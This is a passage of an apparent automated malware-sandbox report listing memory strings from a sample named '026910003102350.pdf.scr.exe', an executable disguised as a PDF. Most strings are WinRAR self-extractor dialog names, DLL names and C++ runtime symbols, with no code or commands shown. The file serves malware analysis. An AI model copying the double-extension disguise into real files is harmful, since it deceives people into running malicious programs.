      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotfindvol
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badarchive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extracting
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_asknextvoltitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_archeaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_done
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_error
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_bytes
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_modifiedon
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badfolder
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_createerrors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_restarthint
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_crcerrors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_allfiles
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1a
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_arcbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilesto
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilestotemp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractbutton
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractprogress
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_maxpathlimit
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unkencmethod
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongpassword
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongfilepassword
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_copyerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnks
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnkh
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errlnktarget
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_needadmin
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_pause
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_continue
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secwarning
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secdeldll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_destedittitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_changedir
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_progressbartitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrfileexists
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owraskreplace
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrquestion
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owryes
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrrename
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrno
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrnoall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renamefrom
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renameto
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idc_passwordenter
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolfind
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: user32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gdi32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comdlg32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: advapi32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shell32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ppngriched20.dlls:ids_browsetitles:ids_cmdextractings:ids_skippings:ids_unexpeofs:ids_fileheaderbrokens:ids_headerbrokens:ids_mainheaderbrokens:ids_cmtheaderbrokens:ids_cmtbrokens:ids_outofmemoryerrors:ids_unknownmethods:ids_cannotopens:ids_cannotcreates:ids_cannotmkdirs:ids_encrcrcfaileds:ids_extrcrcfaileds:ids_packeddatacrcfaileds:ids_writeerrors:ids_readerrors:ids_closeerrors:ids_cannotfindvols:ids_badarchives:ids_extractings:ids_asknextvoltitles:ids_archeaderbrokens:ids_dones:ids_errors:ids_errorss:ids_bytess:ids_modifiedons:ids_badfolders:ids_createerrorss:ids_restarthints:ids_crcerrorss:ids_allfiless:ids_title1s:ids_title1as:ids_title2s:ids_title3s:ids_title4s:ids_title5s:ids_title6s:ids_arcbrokens:ids_extrfilestos:ids_extrfilestotemps:ids_extractbuttons:ids_extractprogresss:ids_maxpathlimits:ids_unkencmethods:ids_wrongpasswords:ids_wrongfilepasswords:ids_copyerrors:ids_cannotcreatelnkss:ids_cannotcreatelnkhs:ids_errlnktargets:ids_needadmins:ids_pauses:ids_continues:ids_secwarnings:ids_secdeldll$startdlg:size$startdlg:caption$startdlg:idc_destedittitle$startdlg:idc_changedir$startdlg:idc_progressbartitle$startdlg:idok$startdlg:idcancel$replacefiledlg:size$replacefiledlg:caption$replacefiledlg:idc_owrfileexists$replacefiledlg:idc_owraskreplace$replacefiledlg:idc_owrquestion$replacefiledlg:idc_owryes$replacefiledlg:idc_owrall$replacefiledlg:idc_owrrename$replacefiledlg:idc_owrno$replacefiledlg:idc_owrnoall$replacefiledlg:idc_owrcancel$renamedlg:size$renamedlg:caption$renamedlg:idok$renamedlg:idcancel$renamedlg:idc_renamefrom$renamedlg:idc_renameto$getpassword1:size$getpassword1:caption$getpassword1:idc_passwordenter$getpassword1:idok$getpassword1:idcancel$licensedlg:size$licensedlg:caption$licensedlg:idok$licensedlg:idcancel$asknextvol:size$asknextvol:caption$asknextvol:idc_nextvolinfo1$asknextvol:idc_nextvolfind$asknextvol:idc_nextvolinfo2$asknextvol:idok$asknextvol:idcancelrarsfxstaticreplacefiledlgrenamedlg%s %s %s%s %sgetpassword1%sxasknextvolwinrarsfxmappingfile.tmpsfxname%4d-%02d-%02d-%02d-%02d-%02d-%03dsfxstimestartdlgsfxcmdsfxparlicensedlg __tmp_rar_sfx_access_check_%u-el -s2 "-d%s" "-sp%s"runas"%s"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %sdeletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode%s.%d.tmpsoftware\microsoft\windows\currentversionprogramfilesdir\hidemaxmin%s%s%u.lnk.infinstallsoftware\winrar sfxuser32.dllgdi32.dllcomdlg32.dlladvapi32.dllshell32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ole32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fole32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: acquiresrwlockexclusive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasesrwlockexclusive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shlwapi.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comctl32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: kernel32.dllacquiresrwlockexclusivereleasesrwlockexclusiveshlwapi.dllcomctl32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad array new length
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad array new length@
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <5ikq
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad exception
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __cdecl
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __pascal
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __stdcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __thiscall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __fastcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __vectorcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __clrcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __eabi
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __ptr64
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __restrict
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __unaligned
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: restrict(
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: delete
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vftable'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vbtable'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vcall'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `typeof'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local static guard'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `string'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vbase destructor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector deleting destructor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `default constructor closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `scalar deleting destructor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector destructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector vbase constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `virtual displacement map'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector destructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector vbase constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `copy constructor closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `udt returning'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `rtti
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local vftable'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local vftable constructor closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: new[]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: delete[]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `omni callsig'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `placement delete closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `placement delete[] closure'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector destructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector vbase copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `dynamic initializer for '
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `dynamic atexit destructor for '
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector vbase copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector copy constructor iterator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local static thread guard'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator ""
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator co_await
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator<=>
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: type descriptor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: base class descriptor at (
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: base class array'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: class hierarchy descriptor'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: complete object locator'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `anonymous namespace'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__swift_3__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->*++---+&->*/%<<=>>=,()~^|&&||*=+=-=/=%=>>=<<=&=|=^=`vftable'`vbtable'`vcall'`typeof'`local static guard'`string'`vbase destructor'`vector deleting destructor'`default constructor closure'`scalar deleting destructor'`vector constructor iterator'`vector destructor iterator'`vector vbase constructor iterator'`virtual displacement map'`eh vector constructor iterator'`eh vector destructor iterator'`eh vector vbase constructor iterator'`copy constructor closure'`udt returning'`eh`rtti`local vftable'`local vftable constructor closure' new[] delete[]`omni callsig'`placement delete closure'`placement delete[] closure'`managed vector constructor iterator'`managed vector destructor 